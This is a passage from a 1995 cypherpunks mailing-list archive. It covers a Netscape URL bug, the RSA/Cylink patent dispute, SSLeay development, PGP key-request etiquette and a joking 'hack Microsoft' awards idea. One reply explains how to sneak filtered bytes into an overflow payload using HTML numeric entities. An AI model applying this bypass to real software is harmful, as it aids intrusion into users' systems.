Jim Gray, Hong Kong U. of Sci. and Tech, HK
Li Gong, SRI, USA
Sushil Jajodia, GMU, USA
Paul Karger, GTE, USA
Carl Landwehr, NRL, USA
John McLean, NRL, USA
Catherine A. Meadows, NRL, USA
Rich Neely, CTA, USA
Sylvan S. Pinsky, DoD, USA
Mike Reiter, AT&T, USA
Sue Rho, TIS, USA
Peter  Ryan, DRA, UK
Tom Schubert, Portland State Univ., USA
Stuart Stubblebine, AT&T, USA
Elisabeth Sullivan, Sequent, USA
Tom Van Vleck, Taligent, USA
Vijay Varadharajan, Univ. of Western Sydney, AU
Yacov Yacobi, Microsoft, USA
Raphael Yahalom, Hebrew University, Israel
Mary Ellen Zurko, OSF, USA


For further information concerning the symposium, contact:


  Dale Johnson, General Chair        John McHugh, Program Co-Chair
  The MITRE Corporation              Computer Science Department
  Mailstop A156                      Portland State University
  202 Burlington Rd                  P.O. Box 751
  Bedford, MA 01730-1420, USA        Portland OR 97207-0751, USA
  Tel: +1 (617) 271-8894             Tel: +1 (503) 725-5842
  Fax: +1 (617) 271-3816             Fax: +1 (503) 725-3211
  dmj@mitre.org                      mchugh@cs.pdx.edu

  Steve Kent, Vice Chair             George Dinolt, Program Co-Chair
  BBN Systems and Technologies       Loral WDL
  Mailstop 13/2a                     P.O. Box 49041, MS X20
  70 Fawcett Street                  San Jose, CA 95161-9041
  Cambridge, MA 02138                Tel: +1 (408) 473-4150
  Tel: +1 (617) 873-6328             Fax: +1 (408) 473-4272
  Fax: +1 (617) 873-4086             dinolt@wdl.loral.com
  kent@bbn.com

  Charles Payne, Treasurer
  Secure Computing Corporation
  2675 Long Lake Road
  Roseville, MN  55113
  Tel: +1 (612) 628-1594
  Fax: +1 (612) 628-2701
  cpayne@sctc.com

  Peter Ryan, European Contact       Jim Gray, Asia/Pacific Contact
  Defence Research Agency            Department of Computer Science
  Room NX17                          Hong Kong Univ. of Science & Technology
  St Andrew's Rd                     Clear Water Bay, Kowloon, Hong Kong
  Malvern                            Tel: +852 358-7012
  Worcs WR14 3PS,UK                  Fax: +852 358-1477
  Tel +44 (0684) 895845              gray@cs.ust.hk
  Fax +44 (0684) 894303
  ryan@rivers.dra.hmg.gb

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 08:11:07 PDT
To: cypherpunks@toad.com
Subject: Hack Microsoft
In-Reply-To: <199509281208.IAA06190@pipe4.nyc.pipeline.com>
Message-ID: <199509281510.LAA21039@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
>    9-28-95. W$Japer:
> 
>       Regarding Netscape, Mr. Dent of Microsoft said the
>       firm's security deficiencies that have recently come to
>       light have "tainted" electronic commerce on the
>       Internet.

Thats almost an invitation to hack Microsoft's web products, isn't it?

(Anyone from Netscape care to join in the fun?)

Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 28 Sep 95 03:51:10 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v02120d01ac88cf556dd4@[199.2.22.120]>
Message-ID: <9509281050.AA15525@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes writes:
 > Spent too much time last night playing with the Netscape bug;
 > among other things wrote some code to throw various random binary
 > URLs at Netscape. Netscape seems prepared to swallow the bait
 > as long as the URL does _not_ contain characters screened as
 > follows:
 >  if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
 > This means you can't plant 0x00, 0x22, 0x3e or 0x2f.

No, you *can* put 0x22, 0x3e and 0x2f by using respectively
&#34; &#62; and &#47; html constructs  (&#nnn; nn decimal ascii code)
unfortunatly &#0; is not recognized but you can probaly use any number
substracted by itself or even short lda#0 (depending on the cpu),...if
you need a zero,...(what for ?)

I hope this helps too, btw, anywone having contacts on the 8lgm folks?
they must have experience with that kind of stuff...

Uptodate infos kept on http://hplyot.obspm.fr/~dl/netscapesec/

It seems the anim is working on about every netscape around, except
one folk on linux that reported it didn't crash though someone else,
on linux too said it crashed...

Even if a patch should be availble now, making a demonstration is
still interesting IMO [specially when you know that there are still
ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP
access packages!...]

dl

--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Qaddafi ammunition radar Legion of Doom KGB Khaddafi Croatian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Thu, 28 Sep 95 09:50:44 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Java
Message-ID: <01HVT4585WLY000R2D@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> From:	IN%"jya@pipeline.com"  "John Young" 25-SEP-1995 15:29:30.33
> To:	IN%"WOOD@VAX2.ROCKHURST.EDU"
> CC:	
> Subj:	JAV_jiv
> 
> 
>    The New York Times, September 25, 1995, pp. D1, D4.
> 
> 
> 
>    Sun is a maker of computers and software using the
>    industry-standard Unix software operating system and the
>    leading provider of so-called Internet server computers
>    that act as the gateway through which most people's desktop
>    computers actually send and receive data over the Net.
>    Figuring that what is good for the Internet is good for
>    Sun, the company now hopes to turn Java into an industry
>    standard by making it freely available to individuals and
>                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>    universities, while licensing it to companies that
>    incorporate it into software products.
> 
	
Does anyone know when or where Java is available?

Many thanks,

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 28 Sep 95 08:52:03 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509281309.JAA12017@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950928114956.15217B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



Is this the return of "Mosaic Communications" :-) 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 08:54:04 PDT
To: cypherpunks@toad.com
Subject: european version of EFF/EPIC/etc?
Message-ID: <199509281553.LAA21103@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I was wondering if the Eurpeans had an equivalent of EPIC or EFF
lobbying against crypto restrictions there, given the disturbing news
a week or so ago.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 08:59:15 PDT
To: cypherpunks@toad.com
Subject: Re: european version of EFF/EPIC/etc?
In-Reply-To: <199509281553.LAA21103@frankenstein.piermont.com>
Message-ID: <199509281559.LAA21120@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" writes:
> I was wondering if the Eurpeans had an equivalent of EPIC or EFF

I hate it when I type too fast. Obviously that isn't intended to be a
new continent!

> lobbying against crypto restrictions there, given the disturbing news
> a week or so ago.
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 28 Sep 95 12:03:44 PDT
To: baldwin@RSA.COM (Robert W. Baldwin)
Subject: Q&A on the RSA/Cylink legal dispute
Message-ID: <9508288123.AA812314973@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain



        Here is RSA's Question & Answer sheet on the arbitration.
It is available on our web site, www.rsa.com.
                --Bob

______________________________ Forward Header __________________________________

  [RSALogo]   ---------------------------------------------------------------
              Q&A ON THE RSA/CYLINK LEGAL DISPUTE

This page contains general questions that have been brought up to us 
regarding the legal dispute between RSA and Cylink. We are providing these 
answers in hopes that you may better understand the issues.

----------------------------------------------------------------------------

                             September 25, 1995

Q. How did RSA's legal disputes with Cylink begin?

     A. It began in April of 1994 when Cylink filed an Arbitration Demand 
     seeking to have a panel rule that Cylink was entitled to a retroactive 
     patent license to RSA, also called the MIT patent. That was the extent 
     of their Arbitration Demand at that time. The dispute was precipitated 
     by RSA's discovery that Cylink had entered into a secret deal to 
     provide products incorporating the patented MIT technology - even 
     though Cylink knew it did not have a license.
                                ------------------

Q. Why didn't PKP/RSA just sell them one? Isn't that their business?

     A. We offered them one several times. They wanted to pay essentially 
     nothing for it. Although Cylink denied it, the fact that we offered 
     them a license was confirmed by the Arbitrators in their ruling.
                                ------------------

Q. Patents are routinely licensed and royalties routinely paid; why did 
Cylink go to the extraordinary length of suing RSA Data Security to obtain a 
license?

     A. We learned that in April of 1994 Cylink had won, over other bidders, 
     a very substantial business deal with SWIFT (an international banking 
     consortium) to provide X.25 encryption units for use by SWIFT on a 
     worldwide basis. SWIFT had insisted that these products use the RSA 
     patented technology for key management and authentication. Cylink had 
     represented to SWIFT in their April 1994 contract that Cylink had a 
     license to provide RSA technology. But they didn't. Cylink chose to sue 
     us to win a retroactive license rather than simply admit what they had 
     done and pay for a license. Cylink never informed us of their use of 
     RSA or the representation to SWIFT. They never paid a penny to PKP or 
     RSA for their unlicensed use of the RSA technology. They never even put 
     any royalties aside. None of these facts are in dispute and are all a 
     matter of public record.
                                ------------------

Q. How did the litigation go beyond a limited Arbitration over a license?

     A. We didn't understand it at the time, but it's obvious now. While 
     more claims and counterclaims were added to the Arbitration demand, 
     Cylink knew of their SWIFT problem and other similar problems; we 
     didn't. We believe that they were desperately trying to cover their 
     unlicensed use of RSA by trying to litigate us into submission before 
     it was discovered. It didn't work.
                                ------------------

Q. What were the additional claims by each side?

     A. Charges were made by each RSA and Cylink that the other had breached 
     the exclusive licensing authority of PKP among other wrongful acts. 
     This brought a second set of issues for the Arbitrators. Finally, both 
     parties asked to have PKP dissolved as we obviously could not continue 
     as business partners; this was the third issue to be decided. It's 
     quite clear in the Arbitration Panel's ruling that there were only 
     three issues to be decided: (a) is Cylink entitled to a retroactive 
     license to use RSA; (b) did either party breach the Partnership 
     Agreement; and (c) should PKP be dissolved. The answers were no, no, 
     and yes.
                                ------------------

Q. If that's true, then how does Cylink claim that the Panel's ruling 
determined that RSA software customers are infringing the Stanford patents?

     A. The Arbitration Panel did not determine that the use of RSA software 
     by RSA licensees or that the practice of RSA infringes the Stanford 
     patents. It is most certainly true that the ruling was very limited; the 
     Ruling itself starts out by stating the questions. The Panel did not, 
     under any interpretation, rule on patent validity or determine that 
     anyone was infringing. Cylink's claims to the contrary, along with their 
     claims that somehow Cylink can rely on the Ruling to prove infringement 
     is simply not true and ignores many other facts.
                                ------------------

Q. What other facts?

     A. The Panel's ruling was very specific. Everything it said about third 
     parties, including RSA customers who use software, refers to their need 
     for patent licenses. If you bought software from RSA and RSA itself had 
     the rights to make that software and license it to you, you don't need 
     a separate patent license; rights to the patents came with the product. 
     The Ruling also states, "RSA has a right to license its software."
                                ------------------

Q. Under what circumstances would you need a separate patent license?

     A. If you want to make your own product -as opposed to buying one, such 
     as RSA's software- you need a patent license. If you bought a software 
     product but didn't use it, meaning you wrote your own, or re-wrote it, 
     then you may need a separate patent license to do that. We believe the 
     Panel was simply making it clear that just because you bought software 
     from RSA, that fact alone doesn't mean you are free from the need for a 
     separate patent license if you're not using the RSA software and making 
     your own. You didn't get an explicit patent license with the software, 
     you got rights under the patents as necessary to use the software. If 
     you're using RSA's software -you didn't write your own- you don't need 
     a separate patent license under either the MIT or Stanford patents.
                                ------------------

Q. Are there other relevant facts that Cylink has ignored?

     A. Perhaps the most important fact that Cylink is carefully ignoring is 
     that Cylink knows RSA did indeed have rights to make products under the 
     MIT and Stanford patents. Cylink, for over five years, knowing full 
     well what RSA sold and how, has not only referred customers to us, but 
     in some cases where the customer was being cautious, Cylink confirmed 
     to them in writing at their request that no separate patent licenses 
     were necessary if they licensed RSA software. In other words, prospects 
     of RSA's went to Cylink and said, "We're going to license this software 
     from RSA. Do we need separate patent licenses from Cylink or PKP?" 
     Cylink confirmed the answer - no. (And those companies then did in fact 
     license our software. Cylink didn't turn around and sue them.) This 
     alone should deter Cylink from bringing infringement suits against RSA 
     customers. Nothing in the Panel's ruling changes any part of these 
     facts. In fact, Cylink acknowledgment that RSA had such rights came out 
     in the Arbitration proceeding itself. It's a matter of record. Cylink 
     would also not like anyone to be aware that a suit was filed in Federal 
     Court in 1994 to invalidate the Stanford patents, and that a ruling is 
     due in December.
                                ------------------

Q. How is RSA protecting its customers from action by Cylink?

     A. We have filed a Declaratory Relief Action in Federal Court. In that 
     action, we have essentially said that Cylink is estopped -prevented- 
     from taking action against anyone for infringing the Stanford patents 
     for several reasons. The main reason is that companies who licensed 
     software from RSA Data Security rather than "build their own" software 
     do not need separate licenses to the MIT or Stanford patents. Since 
     Cylink has confirmed this many times since 1990, they should not sue 
     anyone for infringement. Another reason is that the Stanford patents 
     are unenforceable and/or invalid. This action by RSA means that any 
     suit brought by Cylink against anyone for infringement of the Stanford 
     patents should be stopped until the resolution of the Declaratory 
     Relief action, and Cylink will have to prevail on all the points above 
     before they can assert any infringement. We have also indemnified our 
     customers against claims such as those implicitly threatened by Cylink. 
     RSA intends to stand behind these indemnity agreements fully. Anyone 
     can bring a lawsuit for just about any reason. If Cylink tries to sue 
     an RSA customer, RSA has both the determination and the resources to 
     defend any such action. Read the Cylink press release carefully. Cylink 
     huffs and puffs a lot, but is not directly threatening to sue anyone 
     -that would mean they would be forced to fight the virtually impossible 
     battle of prevailing on every point in our Declaratory Relief action- 
     but instead are saying that buying a license can eliminate any risk.
                                ------------------

Q. Has anyone else challenged the Stanford patents?

     A. A suit was filed in Federal Court last year by Roger Schlafly to 
     invalidate the Stanford patents. A ruling is due in December. From what 
     we've seen, Schlafly's claims raise disturbing questions about the 
     Stanford patents. This whole business of the Stanford patents may be 
     moot in a few months. There may be no risk - and no need to try to get 
     any money back from Cylink.
                                ------------------

Q. What will be the significance of PKP being dissolved?

     A. The most important change we see is that licenses to the MIT patent 
     will be available for the first time in over five years without Cylink 
     interference. * There is a tremendous amount of pent-up demand, and we 
     are very busy filling it. Many of the largest companies in Europe, Asia, 
     and the US are purchasing licenses to bring RSA-based products to 
     market, including many low-cost chips and smart cards. We have already 
     licensed a number of large and small companies that are bringing 
     RSA-based electronic commerce, access control, and Internet security 
     systems to market; we expect many, many more.
                                ------------------

Q. Why can't RSA and Cylink simply settle their differences?

     A. That's a good question. The fact is that RSA recognizes this 
     litigation is not beneficial to anyone and has offered to settle the 
     dispute by granting Cylink a license to the MIT patent. Cylink has 
     consistently overestimated the strength of its legal position and has 
     refused all reasonable offers. Cylink now finds itself in the 
     unenviable position of trying to sell its security products without RSA 
     technology - which is the de facto industry standard. No amount of 
     "spin doctoring" in press releases by Cylink changes that fact.
                                ------------------

* During its existence from April of 1990 until September of this year, PKP 
could not grant any license without the approval of both partners. As a 
result of PKP's dissolution, the rights to the Stanford patents were 
returned to Cylink, and the exclusive right to license the MIT patent (RSA) 
was returned to RSA Data Security, Inc. Cylink currently has no rights to 
sell any products incorporating the MIT patented technology.

---------------------------------------------------------------------------- 
(C) 1995 RSA Data Security, Inc. All rights reserved.
Permission granted for unlimited reproduction and distribution unmodified.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 28 Sep 95 00:04:50 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: X.509, S/MIME, and evolution of PGP
In-Reply-To: <199509272223.PAA13812@ix7.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.950928120233.1296A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 27 Sep 1995, Bill Stewart wrote:
> 6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
> related code in SSLeay to steal to help implement it?

I am cleaning up and documenting the routines right now, but yes, it is 
possible to implement not only a CA but all the other stuff you mention.

I have finished digital envelope routines (ala Sign, Verify, Seal and Open).
I have the full functionality of RSAref plus support for about umpteen 
differnt cipher in umpteen different modes (well DES, IDEA and RC4 in a 
total of 13 different modes, I use structure pointers to specify ciphers 
so only the ciphers used are linked in and it is also trivial for 
applications to specify new ciphers to use).

Everything needed to implement PEM is there, to do S/MIME I've got to do 
PKCS-7 but that is just a parsing and packageing problem which I will do 
(when I get time) for SSL v3. 

I'm also about to redo my X509_get_certificate routine so that an 
application can 'push' 'methods' onto the system used to lookup certificates.
I need to be able to look them up via an alias, subject X509 DN, and 
via Issuer and ID.  If I get time I'll probably put in a demo 'method' 
that will talk to a socket/host and ask for certificates (proably a 
simple perl server at the other end).

I'm taking the view that if I can put hooks into the library for other 
people to put in routines to retrieve certificates/CRL's I will not have 
to do all the work :-).  I just have to document everything so other 
people can have a play :-)

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Thu, 28 Sep 95 09:40:25 PDT
To: patrick@verity.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
In-Reply-To: <9509280438.AA23997@cantina.verity.com>
Message-ID: <199509281640.MAA20585@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain



>  Date: Wed, 27 Sep 1995 21:38:33 -0700
>  From: patrick@Verity.COM (Patrick Horgan)
>  
>  > 
>  > 	but the key was not there.  Please mail me your key.  Thank you.
>  > 
>  > constructive suggestion as to how this mail could be changed
>  > to convey more information or to be less "threatening", please mail me.
> 
>  Sure, I found the above offensive.  It comes across in exactly the same
>  tone as a cop saying, "Please step away from the car."

Ack!  ;)  Not my intention at all, but a good observation...

>  The simple change:
>  
>        but the key was not there.  Could you please mail me your key?  Thanks.
>  
>  works miracles:)  The tone on the rest of it was nice.  You have to be careful
>  with imperatives.  They usually sound mean...even with a please at the front.

I got this letter in favor of some change in the wording, and a few
letters saying "wording is fine as is".

I assume that those who currently have no beef with the wording will
not be offended by the added words, thus I have happilly integrated
Patrick's suggestion.

I have also added to the code a list of people who don't like
receiving key-queries, added a test that gives an error if the user
attempts to send a key-query to such an address, and made TCM's
address the default value for the list.

I have also added code to maintain a disk-based list of addresses that
have already been mailed for a key, and added code that checks against
this list before sending mail.

I'll put this latest version of mail-secure.el (also upgraded to work
with the latest version of mailcrypt (3.3)) on my web page with in a
day or so.  Until then, anyone who wants a copy can mail me.

To those who sent polite suggestions: thank you.  Your constructive
criticism has helped make mail-secure.el a better tool.  

I encourage anyone else who has suggestions or comments to mail me.  I
try to be responsive to constructive input, as doing so helps the
package improve, be accepted and get used.

TJIC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Thu, 28 Sep 95 10:06:43 PDT
To: cypherpunks@toad.com
Subject: sled corp
Message-ID: <01HVT6WVKX368ZE7S0@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello C-Punks,

I recently found a company called "sled corp" at
<http://www.411.com/> 

they are a white pages directory service (who i have absolutely no
relationship with) that claims they will sign someone's pgp key for
$20/year. to verify the identity of the person's key they are
signing, they require either 1) a mailed or faxed copy of a driver's
license,  2) mailed or faxed copy of a passport,   or 3) a preprinted
personal check (which cleared).

i'm not sure how much i would trust this type of signature anyway, as
all 3 of the above methods of identification can be easily forged,
but i'd appreciate some comments by some of the folks out there that
have considered the concept of key signatures. 

if anyone has had any dealings with this company, i would appreciate
any comments on them. 

feel free to contact me privately if you'd like at either

amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
PGP FP = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D
September 28, 1995   12:58
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMGrUMCgP1O9KJoPBAQGVyQf/fAgOhopOQsWUqG2WiiUPNvW7pAmvkzC6
4zJwxWOduNyrROVPO+NKcJqn4aC7LrZU1qaqZsecBFfoNmGgXwiYLGp9NIVWSFLP
uXdqo+RouDLJSkyWmjhrfYKP/4aN9JaNuesjudu03KDVwDMU2rks9KCHwvQzH6Ry
pFez0YIApA4Y/PgTsq2D2msj4gnEQuXi3y+o28ic/rAtJxY6iPkvX2XJdEW+6KW8
RWp4rFfC6l3T5ccVJ4n6UjJ4wUZsHI93Z7hBdWGJQVaF1g5IQCdmTSCj1EWP/zzp
YH/KcPwqaqjNEiECjCEXCuMEV2ZZPtN0jCXp6KFrIm/ZRzkC3I4SPg==
=i2do
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Thu, 28 Sep 95 13:17:47 PDT
To: cypherpunks@toad.com
Subject: Re: Using sound cards to accelerate RSA?
Message-ID: <199509282017.NAA20380@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Somebody mentioned the possibility of using the a/d stage of a sound card
>as a source of random bits, and that brought a thought back to mind:
>given that a lot of sound cards are now shipping with DSP chips on board,
>has anyone written any code that uses the cards DSP to accelerate RSA
>processing?

But most sound cards still don't have DSP chips. And modern general
purpose CPUs are beginning to give them such a good run for their money
that I wonder whether DSPs will ever become widespread.

I'd stick with running RSA on the main CPU for now.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Thu, 28 Sep 95 11:13:24 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <199509281813.OAA20769@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Thu Sep 28 14:13:09 1995

>  To: cypherpunks@toad.com
>  From: tcmay@got.net (Timothy C. May)
>  
>  At 6:33 PM 9/27/95, Travis Corcoran wrote:
>  
>  What I call a robo-warning was this:
>  
>  "  P.S.  This mail was composed by my mailreading sftwr, which
>          automatically scans incoming mail, looking for failed keyserver
>          requests, and prompts me whether it should automatically send this msg
>          on my behalf.  If there is a bug w this sftwr (for example, you never
>          PGP sign your msgs, so this entire msg makes no sense), or if you're
>          interested in the software itself (mail-secure.el: a package in lisp
>          for emacs; this is just one of the many crypto/privacy related things
>          it does) please mail the author of this package ( tjic@openmarket.com)
>          for details.

Well, I still don't understand why you call a message that says 
	1) "I tried too verify a signature"
	2) "please mail me your key"
	3) "if there's a bug, please mail the author"
a "warning".  

I guess we're just using the word "warning" differently...

>  As to whether I needed to respond to your robo-warning about how
>  your automatic scan of incoming mail produced some kind of
>  Signature Failure Condition Red at your end, I just ignored your
>  message.

I never stated or implied that anyone "needed to" respond to
query-mail.  To the contrary, I said in all seriousness that ignoring
query-mail was "a fine anarchistic solution to the problem".

>  As others will attest, when people ask me for my key in a
>  non-automated way, I usually send it to them.

Well, I still don't understand your objection to labor-saving software
any more than I understand the lifestyles of the Amish, but that's my
problem, not anyone else's.

>  My _overall_ point was not to attack Travis C., who I don't think I
>  even mentioned by name, but to point out that great care must be
>  taken in running automated mail-response programs

I did not take your comments on mail-secure.el as an attack on myself,
but I did want to defend both the use of labor-saving software and
parts of my particular implementation.  Specifically, I defended the
package against incorrect accusations on your part:

1) the query-mail was not a warning
2) the query-mail was not in response to the content of a post
3) the query-mail was not the first method used, but a last-ditch attempt
4) a human is in the loop
5) the keyserver used is not based on some trivial "preference"

However, I do agree whole-heartedly with your above assertion that
"great care must be taken in running automated mail-response
programs".  For this reason I have responded to your and other posts
by adding features to the package to make it even less likely to
bother people who don't want to be bothered.

>  Finally, since Travis is making a fairly big deal over my citing of
>  his post (though anonymously, as I recall), I'd like to see the
>  post he claims I signed.

To the very best of my knowledge *I* did not send you a piece of mail
requesting your key...I've had your key in my keyring for over a year.
Further, I am not asserting that I saw a signed message from you any
time recently.

>  >If anyone has a constructive suggestion as to how this mail could be
>  >changed to convey more information or to be less "threatening", please
>  >mail me.
>  
>  Simple, don't bother to ask in the first place. Or ask informally, in
>  ordinary English. Skip the "This mail was composed by my mailreading sftwr,
>  which automatically scans incoming mail, looking for failed keyserver
>  requests..." nonsense.

Nonsense?  It seems to me that the information is useful, for two
reasons:

(1) it alerts the recipient to the semi-automated nature of the mail,
		which allows the recipient to prioritize his response (if any)
		to it.
(2) it alerts the recipient that incorrect receipt of a key-request
		could be caused by a software bug (as opposed to some attempt
		to forge email).
(3) it notes the existance of the package, which the recipient might
		be interested in (in the same way many cryptography-aware
		programs add a comment line to a PGP-signature).  By the way,
		I have had several people ask for a copy of mail-secure.el after
		receiving a key-request from the package, which translates
		into several more people encrypting their email and verifying the
		messages they receive.
  
>  I don't need some fraction of them running their own "key etiquette
>  agents" inspecting my posts for conformance to their preferences.

Once again you're [ willfully ? ] missing the point: etiquette and
preferences have nothing to do with it, and your repeated assertions
to the contrary trivialize the desire of some people to authenticate
messages they receive (which I and others consider to be a reasonable
goal).

- - -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	  PGP encrypted mail preferred.   Ask me about gnuslive.el for emacs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Auto-signed by mail-secure.el 1.002 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMGrlu4JYfGX+MQb5AQGiSwP+MMgoog/vmsxKU5Zo17L5ZE3KVlYWsbQ7
9kcVb8d2CLPyAyaU4iNmF5dLwdYyy0reft9jhzQAaZ/1Nm0+9KXGAhT7DdO2nDFT
hGc9KiQ/IYEkkhkRJIRRNkVNGeWclbf9J/ffQUUNBBTBbJkjjwoLFns+GA6D2Qx/
xs8QFel7kvQ=
=6Gyn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Thu, 28 Sep 95 11:38:41 PDT
To: sameer <sameer@c2.org>
Subject: Re: awards for hacking microsoft
In-Reply-To: <199509281642.JAA26140@infinity.c2.org>
Message-ID: <Pine.SOL.3.91.950928143432.18471A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, sameer wrote:

> 	I've been working on putting together my hack microsoft
> promotion and I need to think of a good low-budget award. T-shirts
> would not be economically feasible -- I expect to be awarding many
> microsoft awards.. Ideas would be appreciated. Thanks.
> 

What else, Chaum's Digicash.  If you are unwilling to part with any of 
your own, perhaps you can collect contributions, or maybe the Digicash 
people will pony-up some extra cyberbucks for a good cause.  After all, 
they are worth the paper they're printed on. :-)

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Thu, 28 Sep 95 15:03:52 PDT
To: stewarts@ix.netcom.com
Subject: Re: 2^25 Crays a Year to Break STT
Message-ID: <9509282305.AA09854@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


don't you love how the media gets the story straight?

----------
From: Bill Stewart  <stewarts@ix.netcom.com>
To:  <cypherpunks@toad.com>
Subject: Re: 25 Crays a Year to Break STT
Date: Thursday, September 28, 1995 10:33AM

>   Microsoft said its Secure Transaction Technology (STT), was
>   designed to provide a much higher level of security for
>   credit card transactions on the Internet. Netscape's
>   general purpose encryption system uses a 40 or 128-bit
>   electronic "key", while STT will use 2,000-bit keys.
Sigh.  Apples and oranges, and they know it.
.....
>   Although no encryption system was totally secure, Mr Dent
>   estimated it would take "25 Cray supercomputers a year" to
>   break the STT codes.

So how much work can 25 Crays do in a year?  Crack single-DES?
Maybe RC4/64?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 28 Sep 95 13:51:15 PDT
To: "'SMTP:tomw@orac.engr.sgi.com>
Subject: RE: More on "Entropy"
Message-ID: <306B0A5E@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein wrote:

>We used this formulation of entropy in Statistical Mechanics.  It's
>especially useful in Quantum Thermo where you can actually enumerate all
>of the states instead of relying on probabilistic arguments.

Sure, this formulation can be used.  As a pedagogic tool for explaining what 
a theory is all about, many formulations are discussed as if they have 
application in real world situations.  Of course (for pedagogic reasons), 
these discussions focus on systems in which there is a definition, and 
typically a well-behaved mathematical model, for all of the significant 
states.  Some instructors believe this will assist students in appreciating 
